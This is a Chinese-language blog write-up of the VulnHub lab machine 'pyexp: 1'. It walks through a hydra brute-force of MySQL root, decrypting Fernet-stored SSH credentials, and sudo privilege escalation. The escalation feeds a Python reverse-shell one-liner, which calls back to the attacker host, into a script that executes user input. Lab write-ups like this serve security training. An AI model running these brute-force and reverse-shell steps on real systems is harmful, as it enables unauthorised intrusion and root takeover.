vulnhub pyexp: 1

最新推荐文章于 2024-07-21 22:27:18 发布
最新推荐文章于 2024-07-21 22:27:18 发布
阅读量475 收藏
点赞数 1
分类专栏: vulnhub 文章标签: python fernet exec mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/126129710
版权

渗透思路:

nmap扫描端口 ---- hydra爆破mysql默认用户root的密码 ---- 在数据库中发现fernet密文和密钥 ---- python解密fernet密文 ---- 利用python脚本漏洞sudo提权

环境信息:

靶机:192.168.101.95

攻击机:192.168.101.34

具体步骤:

1、nmap扫描端口

sudo nmap -sV -sC -p- 192.168.101.95

只扫描到tcp 1337(ssh)和3306(mysql)

2、hydra爆破mysql默认用户root的密码

由于nmap扫描到的信息太少了,并且ssh登录的用户名犹如大海捞针,而mysql(MariaDB)有默认用户root,所以先试试用hydra爆破mysql用户root的密码。使用字典/usr/share/wordlists/rockyou.txt.gz解压后的rockyou.txt。

hydra -l root -P "rockyou.txt" mysql://192.168.101.95

稍等一会儿,爆破出root的密码prettywoman

3、在数据库中发现fernet密文和密钥

以用户名root,密码prettywoman进入数据库

mysql -h 192.168.101.95 -u root -p

查看所有数据库,发现数据库data

MariaDB [(none)]> show databases;

进入data数据库,查看所有表,发现表fernet

MariaDB [(none)]> use data;
MariaDB [data]> show tables;

查看fernet表中的数据,发现有一条数据

MariaDB [data]> select * from fernet;

cred列的值为gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=

keyy列的值为UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

4、python解密fernet密文

fernet是一种对称加密算法,python中fernet的用法可以在这个网页找到:

Fernet (symmetric encryption) — Cryptography 38.0.0.dev1 documentation

根据上述网页的示例,在python3 shell中(命令行执行python3即可进入)依次执行如下命令,即可得到执行结果b'lucy:wJ9`"Lemdv9[FEw-'

>>> from cryptography.fernet import Fernet
>>> key = b'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
>>> f = Fernet(key)
>>> token = b'gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys='
>>> f.decrypt(token)
b'lucy:wJ9`"Lemdv9[FEw-'

5、利用python脚本漏洞sudo提权

尝试以用户名lucy,密码wJ9`"Lemdv9[FEw-进行ssh登录,ssh端口为1337

ssh lucy@192.168.101.95 -p 1337

登录成功后查看lucy是否可以sudo执行命令

sudo -l

发现lucy可以以root的身份sudo执行python2 /opt/exp.py

(root) NOPASSWD: /usr/bin/python2 /opt/exp.py

查看/opt/exp.py的内容,发现它把用户输入当作python语句执行,利用这点可以提权

在攻击机上nc监听8888端口

nc -nlvp 8888

靶机上执行

sudo python2 /opt/exp.py

在提示how are you?之后输入

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.34",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

由于raw_input()函数默认将输入作为字符串,所以上述命令两侧不要加引号

攻击机上得到靶机root用户的shell

仙女象
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OSCP-3-7-pyexpvm(hydra九头蛇爆破mysqlfernet解密)
墨痕诉清风的博客
08-28 215
【代码】OSCP-3-7-pyexpvm(九头蛇爆破mysqlfernet解密)
vulnhubpyexp
weixin_54431413的博客
06-26 372
主要学习了如何不从web应用突破边界,hydra暴力破解拿到mysql权限:一、进行系统层面的攻击(do_system(),load_file(),\!),二、对数据库信息的分析。python的加解密算法的应用。利用sudo 配置问题的进行提权。...
vulnhub -- pyexp
weixin_46107179的博客
05-16 382
靶机下载链接:下载地址 下载完成后解压,用VMware打开 主机发现 通过arp-scan -l 来发现主机是否存活 信息收集 通过nmap扫描主机开放端口1337和3306,并没有熟悉的80端口 通过searchsploit搜索相关的漏洞利用,发现好像并不能打点成功,接下来只有进行爆破 对ssh和mysql同时进行爆破,发现mysql爆破成功,获取到密码 然后进行登录mysql,尝试执行系统命令,发现不行 尝试读取文件,发现可以通过load_file读取文件,用select load_file(‘
使用Cryptography进行对称密钥加密
CSK的博客
10-09 3366
Cryptography cryptography 库致力于成为“cryptography for humans”,提供各种函数帮助你创建安全,易于使用的加密方案。 本文的环境是在python3.8运行,不过亲测3.5以上运行没有报错。 安装cryptography库 pip install cryptography 在cryptography库中,对称加密算法的抽象是fernet模块,包括了对数据的加解密以及签名验证功能,以及密钥过期机制。 该模块采用如下定义: 加解密算法为AES,密钥位长128,C
字段加密实践(django-fernet-fields)
anmi3721的博客
05-23 862
一、fernet介绍   Fernet 用于django模型字段对称加密,使用 crytography 库。   官网帮助文档 1、先决条件   django-fernet-fields 支持Django 1.8.2以及更高版本,Python 2.7、3.3、3.4、pypy和pypy3。   测试了PostgreSQL、SQLite和MySQL可用,但是任何支持BinaryF...
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub:VulnHub Box演练
03-16
VulnHub:VulnHub Box演练
pyencrypt:使用Fernet库进行Python加密。 脚本生成密钥并加密解密消息
03-28
加密 使用Fernet库进行Python加密。 脚本生成密钥并加密/解密消息。 用法:生成私钥文件:python3 pyencrypt.py -g -k KEYFILE加密消息:python3 crypto.py -k KEYFILE -e MESSAGE_TO_ENCRYPT解密消息:python3 crypto.py -k KEYFILE -d MESSAGE_TO_DECRYPT
pyexp靶机总结
qq_45301512的博客
01-08 557
靶机下载地址:打开靶机.使用nmap扫描出靶机的ip和开放的端口可以看到,靶机开放了1337端口和3306端口1337端口是ssh的端口,3306是mysql数据库的端口根据之前做靶机的经验来看,一般是开放80端口,然后根据网站去找到合适的方法getshell,但是这里没有开放80端口,因此只能考虑1337端口和3306端口那么先对这两个端口进行爆破一波,看是否能爆破出登录的密码由于不知道存在什么用户,因此只能先尝试root用户的爆破。
AES的python重构解密
qq_51179608的博客
09-01 373
建筑市场案例
安装python里强大的加解密库Fernet图文教程(详细版)
m0_70402478的博客
06-12 1970
今天我上网了解了一下关于文件加密的内容,也是偶然吧,我知道了python里的一个很好用的关于加密的库。然后把它好好的利用了一下,写了一个文件加密和解密器。这篇文章,我先介绍一下关于怎么安装这个库。python里的库有很多,这也是python可以成为众多初学者以及网路安全人员喜欢的原因。而基于python的加密库也有很多,比如base64什么的,而我今天所提到的是一个叫fernet的库。首先,我们先来说一下这个库的安装,我们先打开pycharm。(个人推荐使用pycharm,因为确实方便好用)。然后点击左上角
Cryptography中的对称密钥加解密:fernet算法探究
weixin_30632089的博客
01-18 1003
原创文章,欢迎转发朋友圈,转载请注明出处 cryptography是python语言中非常著名的加解密库,在算法层面提供了高层次的抽象,使用起来非常简单、直观,pythonic,同时还保留了各种不同算法的低级别接口,保留灵活性。 我们知道加密一般分为对称加密(Symmetric Key Encryption)和非对称加密(Asymmetric Key Encryption)。,各自对...
PG::PyExp
aya3t的博客
12-16 361
PROVING GROUNDS::PyExp
使用Python的Turtle库绘制动态风车
爱写代码的小朋友
07-20 306
python绘制风车
Java-Lambda
最新发布
lizhiwei21的博客
07-21 134
lambda表达式可以理解为对匿名内部类的一种简化 , 但是本质是有区别的面向对象思想 :强调的是用对象去完成某些功能函数式编程思想 :强调的是结果 , 而不是怎么去做。
华为od机试真题 — 代表团坐车(Python)
学习,你不是一个人在战斗 ~ 961302305(QQ,微信)
07-17 596
【华为od机试真题 】代表团坐车(Python) 某组织举行会议,来了多个代表团同时到达,接待处只有一辆汽车可以同时接待多个代表团,为了提高车辆利用率,请帮接待员计算可以坐满车的接待方案输出方案数量。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值